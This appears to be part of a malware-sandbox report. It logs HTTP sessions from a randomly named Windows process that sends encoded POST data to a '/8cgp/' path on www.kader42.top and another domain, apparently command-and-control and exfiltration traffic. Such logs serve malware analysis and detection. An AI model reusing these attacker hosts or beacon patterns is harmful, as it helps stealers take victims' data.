                                                                    Apr 24, 2024 12:31:46.756810904 CEST5156OUTData Raw: 79 46 74 2b 4f 4d 32 6c 73 51 51 36 79 66 6e 47 38 45 57 34 47 68 35 67 2f 72 50 6d 67 52 56 45 78 4a 4d 4d 4a 69 4a 47 36 49 6e 47 4d 79 6e 71 46 4e 51 77 69 39 53 76 34 38 53 30 48 46 46 67 64 59 4c 53 6d 73 4c 51 66 30 77 4b 45 6e 66 64 4b 31
                                                                    Data Ascii: yFt+OM2lsQQ6yfnG8EW4Gh5g/rPmgRVExJMMJiJG6InGMynqFNQwi9Sv48S0HFFgdYLSmsLQf0wKEnfdK1/hQHSsxex9Oge4DM62qq3QXYTIH8ckgv9bUMcZrU0bjpkxNU4ZKfUBGKcT1Xd2Dd5o/hlQM2XJDQtIRrdgPA7+KdXWuP9S3QvkJR2+H4IK6YX4gegZGSnYrmOoOru78/KUIi6sVA5DIPLijI6qpD2xaySeBMOk/dd
                                                                    Apr 24, 2024 12:31:46.757061958 CEST299INHTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:31:46 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                                                    Apr 24, 2024 12:31:47.061136007 CEST2578OUTData Raw: 64 72 45 35 6c 61 50 65 6f 2b 32 4d 4f 72 71 50 43 63 5a 6f 7a 77 59 31 36 4a 67 42 34 48 39 53 48 43 77 63 62 31 4b 65 4e 6c 4a 70 6f 58 73 75 2b 69 41 52 57 4f 6a 57 34 6c 2f 2f 6c 6f 53 46 7a 49 4e 49 57 66 33 56 58 6b 36 38 6f 77 7a 55 53 6e
                                                                    Data Ascii: drE5laPeo+2MOrqPCcZozwY16JgB4H9SHCwcb1KeNlJpoXsu+iARWOjW4l//loSFzINIWf3VXk68owzUSnaHuBtUhbnsj7BJjTcUFfx+MlhHY4WoZi755Hgqh7A+XnE1c3RYrpRsIAKt6l/+qRDOlLIRjDbWRAMlIZ9t1DE+9xSlGiwSmbvNUkVb8WvwEPkp1xi1/IP0kKt5H9vSZkU4erknbVH6q4KnWyNMdRL9gUblh3jUYXR
                                                                    Apr 24, 2024 12:31:47.061291933 CEST2578OUTData Raw: 58 4f 6f 76 58 34 4c 77 65 79 7a 65 39 33 56 2b 48 57 6d 77 39 72 73 4b 51 57 37 75 4e 32 6d 54 5a 4d 6d 39 74 54 52 58 64 74 53 47 68 42 58 43 4b 31 36 43 34 59 43 62 73 56 47 30 6c 42 4d 73 44 62 56 5a 6c 49 41 54 74 6e 51 32 55 6d 74 67 43 39
                                                                    Data Ascii: XOovX4Lweyze93V+HWmw9rsKQW7uN2mTZMm9tTRXdtSGhBXCK16C4YCbsVG0lBMsDbVZlIATtnQ2UmtgC9K0VZass3EbmQMBf4+ROGESVm07B/eKsjTPICRmi1iizhcONkQXl/Uf3+TiLWQJqAxtaH52erEEbkC5/Uko12r077SJCOixYIXg3g3FYduaOAS5Y+ALeO7d4+doNTUsCh0u8NyBZohTjFj4MIdHHGMU+hnZWtGvszT
                                                                    Apr 24, 2024 12:31:47.061546087 CEST2578OUTData Raw: 48 76 50 53 77 4e 4b 63 36 74 38 50 4c 57 53 32 32 43 42 36 38 44 75 43 2b 41 4c 67 65 51 52 7a 2f 42 4a 30 41 53 2b 48 61 41 33 71 61 68 4a 46 46 42 72 57 7a 46 71 74 6f 45 59 76 34 68 4b 54 76 49 2b 30 38 5a 62 66 64 6e 67 46 66 5a 43 61 63 72
                                                                    Data Ascii: HvPSwNKc6t8PLWS22CB68DuC+ALgeQRz/BJ0AS+HaA3qahJFFBrWzFqtoEYv4hKTvI+08ZbfdngFfZCacrAE1BVwjurKmQSntb9tHbBio26GyPBsgFgz6bquggE1bCKbBrcZ/Spl8yaQQ1OdkPoddiP9YHLYtVYODqOcxSzLG/KzTSTrbhIO8dtAiZY66jcp86zmOXyPr+1OmVcvwmOW08iq58o9o+QRk256yGdFcj4xu5UmiJM
                                                                    Apr 24, 2024 12:31:47.061717033 CEST7012OUTData Raw: 6f 48 62 41 30 55 52 56 69 64 35 54 4e 2b 62 53 57 5a 6c 6e 38 4d 44 68 6d 6e 59 48 62 69 7a 54 47 2f 55 42 45 73 39 35 75 36 32 58 78 46 34 34 59 67 52 6d 33 32 48 76 66 4a 39 74 52 50 65 35 6a 73 53 4c 76 6c 35 6b 54 30 57 44 54 73 4a 74 61 71
                                                                    Data Ascii: oHbA0URVid5TN+bSWZln8MDhmnYHbizTG/UBEs95u62XxF44YgRm32HvfJ9tRPe5jsSLvl5kT0WDTsJtaqlGzx8rG1445gOCG9PtCpVyiGQfli7JjZR9/1VBbJVyiB2PomLN+dE8feyadSsVNtgXxsZeZwCnbtYo4hRNlUMSV8jU7A5J3lJUw0HcjQD7TnpZpZZJ0OD2UESFniy7MnG1vqQjqfCpkHzWB2Asx2T5+AuFyjuWGwv


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    49192.168.11.205029464.190.62.22807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:31:49.282418013 CEST398OUTGET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.donantedeovulos.space
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:31:49.618956089 CEST1289INHTTP/1.1 200 OK
                                                                    date: Wed, 24 Apr 2024 10:31:49 GMT
                                                                    content-type: text/html; charset=UTF-8
                                                                    transfer-encoding: chunked
                                                                    vary: Accept-Encoding
                                                                    x-powered-by: PHP/8.1.17
                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    pragma: no-cache
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_eKr9LQaF/UwlZ82oytgOoGCf7MqvkeVp4z2edrRx+2MyvbiJBOr1DeaA9QlHvRzAkWizzaWWo+6BdQyWjrGQGQ==
                                                                    last-modified: Wed, 24 Apr 2024 10:31:49 GMT
                                                                    x-cache-miss-from: parking-6fb6b6d5c7-dq5hw
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 65 4b 72 39 4c 51 61 46 2f 55 77 6c 5a 38 32 6f 79 74 67 4f 6f 47 43 66 37 4d 71 76 6b 65 56 70 34 7a 32 65 64 72 52 78 2b 32 4d 79 76 62 69 4a 42 4f 72 31 44 65 61 41 39 51 6c 48 76 52 7a 41 6b 57 69 7a 7a 61 57 57 6f 2b 36 42 64 51 79 57 6a 72 47 51 47 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 64 6f 6e 61 6e 74 65 64 65 6f 76 75 6c 6f 73 2e 73 70 61 63 65 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 64 6f 6e 61 6e 74 65 64 65 6f 76 75 6c 6f 73 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 6f 6e 61 6e 74 65 64 65 6f 76 75 6c 6f 73 2e 73 70 61 63 65 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69
                                                                    Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_eKr9LQaF/UwlZ82oytgOoGCf7MqvkeVp4z2edrRx+2MyvbiJBOr1DeaA9QlHvRzAkWizzaWWo+6BdQyWjrGQGQ==><head><meta charset="utf-8"><title>donantedeovulos.space&nbsp;-&nbsp;donantedeovulos Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="donantedeovulos.space is your first and best source for all of the information youre looki
                                                                    Apr 24, 2024 12:31:49.618972063 CEST1289INData Raw: 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 64 6f 6e 61 6e 74 65
                                                                    Data Ascii: ng for. From general topics to more of what you would expect to find here, donantedeovulos.space has it1062 all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparkin
                                                                    Apr 24, 2024 12:31:49.618995905 CEST1289INData Raw: 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66
                                                                    Data Ascii: root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-w
                                                                    Apr 24, 2024 12:31:49.619097948 CEST1289INData Raw: 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 37 33 39 34 38 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c
                                                                    Data Ascii: nnouncement{background:#273948;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text
                                                                    Apr 24, 2024 12:31:49.619112015 CEST1289INData Raw: 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d
                                                                    Data Ascii: print__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-li
                                                                    Apr 24, 2024 12:31:49.619131088 CEST1289INData Raw: 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77
                                                                    Data Ascii: ;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-bloc
                                                                    Apr 24, 2024 12:31:49.619143009 CEST1289INData Raw: 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b
                                                                    Data Ascii: r:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-siz
                                                                    Apr 24, 2024 12:31:49.619251013 CEST820INData Raw: 6c 61 74 69 76 65 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f
                                                                    Data Ascii: lative;height:100%;margin:0 auto !important;overflow:hidden}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{m
                                                                    Apr 24, 2024 12:31:49.619266987 CEST1289INData Raw: 41 45 43 0d 0a 74 69 2d 61 72 72 6f 77 73 2e 70 6e 67 22 29 20 23 32 37 33 39 34 38 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 74 6f 70 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39 35 25 20 32 39 34 30 70 78 3b 66 6c 65 78 2d
                                                                    Data Ascii: AECti-arrows.png") #273948 no-repeat center top;background-size:95% 2940px;flex-grow:2;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1;top:-300px;right:-50px;height:1300px;positi
                                                                    Apr 24, 2024 12:31:49.619278908 CEST1289INData Raw: 69 67 68 74 3a 31 38 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 74 65 78 74 2d 64 65 63 6f
                                                                    Data Ascii: ight:18px;color:#fff}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-l
                                                                    Apr 24, 2024 12:31:49.929543972 CEST1289INData Raw: 62 6c 6f 63 6b 6b 65 79 22 3a 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b
                                                                    Data Ascii: blockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_eKr9LQaF/UwlZ82oytgOoGCf7MqvkeVp4z2edrRx+2MyvbiJBOr1DeaA9QlHvRzAkW576izzaWWo+6BdQy


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    50192.168.11.2050295108.186.8.155807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:11.569351912 CEST656OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kader42.top
                                                                    Origin: http://www.kader42.top
                                                                    Referer: http://www.kader42.top/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 65 70 2b 6f 6c 39 5a 39 2f 59 33 51 4e 44 74 2f 43 73 78 44 4f 6d 2b 4d 77 33 66 6e 54 52 57 76 37 48 6d 6e 6a 44 69 54 36 57 70 33 75 71 39 6b 49 62 73 45 71 55 50 61 72 4d 66 6f 67 69 55 4c 37 30 70 42 69 4d 48 54 4c 4b 34 46 50 50 65 4f 42 72 48 2f 37 78 4b 59 7a 43 4a 4e 75 49 48 78 75 33 67 2f 71 45 56 55 77 61 46 64 50 51 2b 75 6b 74 6c 31 50 47 78 33 48 57 65 51 46 6c 52 70 43 57 44 57 64 63 57 6c 68 77 76 74 69 73 57 6c 53 67 76 31 53 41 32 33 2b 78 2b 73 62 35 67 54 42 5a 71 64 67 50 32 41 53 30 56 78 70 46 44 35 6d 65 6b 50 78 33 55 4d 43 32 58 41 65 53 70 30 43 41 3d 3d
                                                                    Data Ascii: Xh9lX=ep+ol9Z9/Y3QNDt/CsxDOm+Mw3fnTRWv7HmnjDiT6Wp3uq9kIbsEqUParMfogiUL70pBiMHTLK4FPPeOBrH/7xKYzCJNuIHxu3g/qEVUwaFdPQ+uktl1PGx3HWeQFlRpCWDWdcWlhwvtisWlSgv1SA23+x+sb5gTBZqdgP2AS0VxpFD5mekPx3UMC2XAeSp0CA==
                                                                    Apr 24, 2024 12:32:11.744616032 CEST240INHTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Encoding: gzip
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:11 GMT
                                                                    Connection: close
                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                    Data Ascii: a
                                                                    Apr 24, 2024 12:32:11.744729042 CEST474INData Raw: 31 64 33 0d 0a a5 52 bf 8f d3 30 14 de f3 57 58 5e 92 48 d4 06 b1 d0 6b d3 e1 10 eb 89 e1 36 c4 e0 38 6e e2 c3 89 8d fd d2 b4 45 37 30 f0 6b 40 b0 9e 74 2c 48 48 0c 0c 2c e8 10 0c fc 35 a9 d4 89 7f 01 a7 09 77 3d 04 13 96 6c cb f6 fb be f7 7d ef
                                                                    Data Ascii: 1d3R0WX^Hk68nE70k@t,HH,5w=l}J\s@i4MxL]Bo[i`i^HWOdJx0-0\$WF`SA,v&:I (~ ?]
                                                                    Apr 24, 2024 12:32:11.744740009 CEST13INData Raw: 38 0d 0a d1 4b 89 0e 21 03 00 00 0d 0a
                                                                    Data Ascii: 8K!
                                                                    Apr 24, 2024 12:32:11.744750023 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    51192.168.11.2050296108.186.8.155807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:14.272114992 CEST996OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kader42.top
                                                                    Origin: http://www.kader42.top
                                                                    Referer: http://www.kader42.top/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 65 70 2b 6f 6c 39 5a 39 2f 59 33 51 4d 6a 64 2f 44 4e 78 44 4a 47 2b 50 38 58 66 6e 63 78 57 56 37 48 36 6e 6a 44 4b 44 37 6b 4e 33 75 4f 31 6b 61 61 73 45 2f 55 50 61 68 73 65 73 75 43 55 2b 37 30 6c 6a 69 4f 54 54 4c 4b 73 46 50 35 4b 4f 44 62 48 38 6a 42 4b 62 6e 53 4a 49 71 49 48 72 75 33 6b 6a 71 46 52 55 77 4a 52 64 49 53 47 75 6a 38 6c 32 63 32 78 31 4d 32 65 58 4f 46 52 5a 43 57 48 65 64 59 57 62 68 43 7a 74 69 4d 32 6c 54 67 76 32 4c 67 32 77 6d 78 2f 35 64 62 52 64 45 62 66 73 6e 65 43 35 63 30 46 70 6d 6d 37 44 67 49 41 64 73 31 45 67 4c 31 50 65 58 42 41 6a 52 4b 46 48 6a 4b 54 4e 4b 4f 71 75 4d 4a 56 6a 62 71 55 78 50 71 75 61 69 4d 2f 41 79 68 76 32 2f 34 7a 57 64 35 73 37 4f 65 78 53 4e 48 32 57 41 64 46 4a 42 4a 50 34 58 70 70 39 58 55 4d 70 66 64 67 55 6f 32 55 4a 61 78 56 45 7a 37 74 6b 75 48 54 56 5a 47 49 48 54 41 30 53 52 51 35 6b 4e 61 51 47 78 4b 78 49 77 52 74 6e 43 50 31 75 78 67 5a 73 51 64 44 46 51 6e 67 63 46 48 37 45 50 48 67 49 67 31 47 4f 45 48 70 39 33 41 55 37 6c 33 79 69 7a 79 53 4a 6a 56 65 55 42 64 4b 6b 32 6d 6c 59 53 57 4f 31 6c 6b 49 73 79 77 37 4a 62 33 4f 48 35 78 54 31 4d 70 76 47 6e 38 6b 68 59 67 50 52 46 47 53 55 77 33 6e 52 6e 45 33 4b 52 35 73 52 50 35 57 4a 6a 2b 7a 34 42 4a 63 47 43 45 34 32 68 4b 6d 35 44 4d 54 38 6b 31 6d 77 42 50 78 76 76 67 77 6b 37 6e 77 4e 5a 46 66 6f 77 77 37 31 51 78 50 6e 75 57 4f 50 54 4c 4d 74 6e 4a 34 72 48 30 51 6d 34 6b 6f 53 4c 73 7a 45 54 4f 4d 34 44 63 65 77 7a 53 2f 4a 77 51 69 6a 4d 68 37 45 6e 47 57 41 42 32 47 6f 41 6f 4d 37 44 6c 32 5a 6c 4d 64 46 73 50 4a 79 45 45 65 58 4f 2b 72 59 79 4a 67 3d
                                                                    Data Ascii: Xh9lX=ep+ol9Z9/Y3QMjd/DNxDJG+P8XfncxWV7H6njDKD7kN3uO1kaasE/UPahsesuCU+70ljiOTTLKsFP5KODbH8jBKbnSJIqIHru3kjqFRUwJRdISGuj8l2c2x1M2eXOFRZCWHedYWbhCztiM2lTgv2Lg2wmx/5dbRdEbfsneC5c0Fpmm7DgIAds1EgL1PeXBAjRKFHjKTNKOquMJVjbqUxPquaiM/Ayhv2/4zWd5s7OexSNH2WAdFJBJP4Xpp9XUMpfdgUo2UJaxVEz7tkuHTVZGIHTA0SRQ5kNaQGxKxIwRtnCP1uxgZsQdDFQngcFH7EPHgIg1GOEHp93AU7l3yizySJjVeUBdKk2mlYSWO1lkIsyw7Jb3OH5xT1MpvGn8khYgPRFGSUw3nRnE3KR5sRP5WJj+z4BJcGCE42hKm5DMT8k1mwBPxvvgwk7nwNZFfoww71QxPnuWOPTLMtnJ4rH0Qm4koSLszETOM4DcewzS/JwQijMh7EnGWAB2GoAoM7Dl2ZlMdFsPJyEEeXO+rYyJg=
                                                                    Apr 24, 2024 12:32:14.447753906 CEST240INHTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Encoding: gzip
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:32:13 GMT
                                                                    Connection: close
                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                    Data Ascii: a
                                                                    Apr 24, 2024 12:32:14.447904110 CEST474INData Raw: 31 64 33 0d 0a a5 52 bf 8f d3 30 14 de f3 57 58 5e 92 48 d4 06 b1 d0 6b d3 e1 10 eb 89 e1 36 c4 e0 38 6e e2 c3 89 8d fd d2 b4 45 37 30 f0 6b 40 b0 9e 74 2c 48 48 0c 0c 2c e8 10 0c fc 35 a9 d4 89 7f 01 a7 09 77 3d 04 13 96 6c cb f6 fb be f7 7d ef
                                                                    Data Ascii: 1d3R0WX^Hk68nE70k@t,HH,5w=l}J\s@i4MxL]Bo[i`i^HWOdJx0-0\$WF`SA,v&:I (~ ?]
                                                                    Apr 24, 2024 12:32:14.447916031 CEST13INData Raw: 38 0d 0a d1 4b 89 0e 21 03 00 00 0d 0a
                                                                    Data Ascii: 8K!
                                                                    Apr 24, 2024 12:32:14.447926044 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    52192.168.11.2050297108.186.8.155807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:16.975297928 CEST2578OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kader42.top
                                                                    Origin: http://www.kader42.top
                                                                    Referer: http://www.kader42.top/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
